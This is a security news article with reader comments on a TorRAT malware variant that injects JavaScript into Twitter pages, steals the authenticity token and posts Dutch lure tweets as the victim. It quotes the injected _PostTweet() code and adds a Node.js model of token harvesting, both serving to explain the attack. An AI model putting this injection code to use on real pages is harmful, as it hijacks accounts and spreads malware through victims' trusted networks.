JavaScript Twitter injection launches Man-in-the-Browser attacks

happygeek

Dana Tamir, Enterprise Security Director for Trusteer, has recently uncovered a variation of the TorRAT banking malware which has been actively configured to target Twitter users. The attack works by "injecting Javascript code into the victim's Twitter account page", Tamir says, adding that the malware "collects the user's authentication token, which enables it to make authorized calls to Twitter's APIs, and then posts new, malicious tweets on behalf of the victim". These tweets are used, of course, to spread the malware within the victim's social networking circle by leveraging the trust that is implicit in such networks. Twitter users, generally speaking, follow people and accounts that they trust. When one of those accounts is compromised by such an attack it becomes quite easy to persuade followers to click through to drive-by malware pages, simply courtesy of the implied trust invested in the original poster.

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris", which roughly translates to "Our new King Willem will earn even more than Beatrix. Check his salary", followed by a malicious link.
Of course, the attack vector will most likely soon change as other groups adopt the methodology and adapt the code accordingly.

Dana Tamir provided an excerpt from the injected JavaScript code to highlight what is being done:

function _PostTweet() {
    // Read the CSRF token Twitter embeds in the logged-in page. The injected
    // script runs inside the victim's page, so it can read the DOM like any
    // legitimate page script would.
    var a = $('input[name="authenticity_token"]').val();
    // Only post if a token was found. The browser attaches the victim's session
    // cookie automatically, so the server sees an ordinary, authorised tweet.
    a.length > 0 && $.post("/i/tweet/create", {
        authenticity_token: a,
        place_id: "",
        status: _GetRndMsg()   // rotating lure text; not included in the excerpt
    }).always(function () {
        // Record that the message was sent, save state and reload the page so
        // the victim notices nothing. ar and SetO() are not part of the excerpt.
        ar[0].msgsent = 1, SetO(), window.location.href = window.location.href
    })
}

Trusteer advises that enterprise exploit prevention technology, which prevents vulnerable endpoint applications (browser clients) from being exploited and malware from being downloaded and executed, is the best way to stop such attacks dead. "External sources like web content and email attachments, which can include a hidden exploit in the form of embedded code, should never be trusted", Trusteer says. "Such content should only be opened while monitoring the application state to ensure it is operating legitimately."
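As an added illustration (not code from the article, from Trusteer or from the malware), the following Node.js model shows why the authenticity_token harvested in the excerpt does not stop this attack. A CSRF token defends against requests forged from another origin, which cannot read the victim's page; code injected into the page itself runs in Twitter's own origin and reads the token like any legitimate script. The server, session cookie, token value, page markup and endpoint behaviour are all constructed for the example, and harvestToken stands in for the jQuery $('input[name="authenticity_token"]').val() call because Node has no DOM.

```javascript
// Added example, not code from the article, Trusteer or the malware. A toy model
// of a logged-in page, the server endpoint behind it, and two ways of hitting it:
// a cross-site forgery (no token, rejected) and the Man-in-the-Browser pattern
// from the excerpt (token harvested from the page, accepted). All values are
// constructed for illustration.

// Constructed markup for the relevant part of a logged-in page. Only the hidden
// CSRF field matters here; Twitter's real markup is not reproduced.
const PAGE_HTML = `
<form action="/i/tweet/create" method="post">
  <input type="hidden" name="authenticity_token" value="tok-8f3a2c91d0">
  <textarea name="status"></textarea>
</form>`;

// Toy server: one victim session with a CSRF token bound to it.
function makeServer() {
  return { cookie: 'sess-victim-1', authenticityToken: 'tok-8f3a2c91d0', tweets: [] };
}

// Toy /i/tweet/create: the session cookie must be present (browsers attach it to
// any same-site request) and the token must match the one bound to that session.
function tweetCreate(server, req) {
  if (req.cookie !== server.cookie) {
    return { status: 401, error: 'no session' };
  }
  if (req.body.authenticity_token !== server.authenticityToken) {
    return { status: 403, error: 'missing or wrong authenticity_token' };
  }
  server.tweets.push(req.body.status);
  return { status: 200, error: null };
}

// Stand-in for $('input[name="authenticity_token"]').val(): Node has no DOM, so
// the token is pulled from the constructed markup with a regular expression.
function harvestToken(html) {
  const m = /name="authenticity_token"\s+value="([^"]*)"/.exec(html);
  return m ? m[1] : '';
}

// Case 1: classic cross-site request forgery. A page on another origin can make
// the browser send the victim's cookie, but it cannot read the victim's page, so
// it never learns the token. This is exactly what the token is designed to stop.
function crossSiteForgery(server) {
  return tweetCreate(server, {
    cookie: server.cookie,
    body: { authenticity_token: '', place_id: '', status: 'spam from another origin' },
  });
}

// Case 2: the Man-in-the-Browser pattern from the excerpt. The script has been
// injected into the victim's own page, runs in the page's origin, reads the token
// from the DOM and submits a request the server cannot tell from a real one.
function manInTheBrowser(server, html, lure) {
  const a = harvestToken(html);
  if (a.length === 0) {
    return { status: 0, error: 'no token in page' };
  }
  return tweetCreate(server, {
    cookie: server.cookie,
    body: { authenticity_token: a, place_id: '', status: lure },
  });
}

// Stand-alone demonstration.
const demoServer = makeServer();
console.log('cross-site forgery:', crossSiteForgery(demoServer));
console.log('man-in-the-browser:', manInTheBrowser(demoServer, PAGE_HTML, 'constructed lure text'));
console.log('tweets now on the victim account:', demoServer.tweets);
```

The point of the model is the second case: once code runs inside the victim's page, every in-page secret (CSRF token, session state, the user's own identity) is available to it, which is why Trusteer's advice targets the endpoint rather than anything the web application could check.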

LastMitch

At the moment this particular attack seems to be confined to the Dutch market, with tweets saying such things as "Onze nieuwe koning Willem gaat nog meer verdienen dan beatrix. check zijn salaris" which roughly translates to "Our new King William will earn even more than Beatrix. Check his salary" and contains a malicious link.

This sounds like an isolated incident; maybe not if it starts spreading, but it's good to know, so I can be aware of this JavaScript code.

Not sure why they used this phrase:

Our new King William will earn even more than Beatrix. Check his salary

What's the meaning behind it?

To me it meant

Wee kin william will earn even mooar than beytrix. check 'is salary

diafol

Interesting. But how does the JS get into a stored post in the first place? How is the script injected? I can understand that the JS code is sent to the server, but doesn't Twitter screen and strip any possible malicious code?
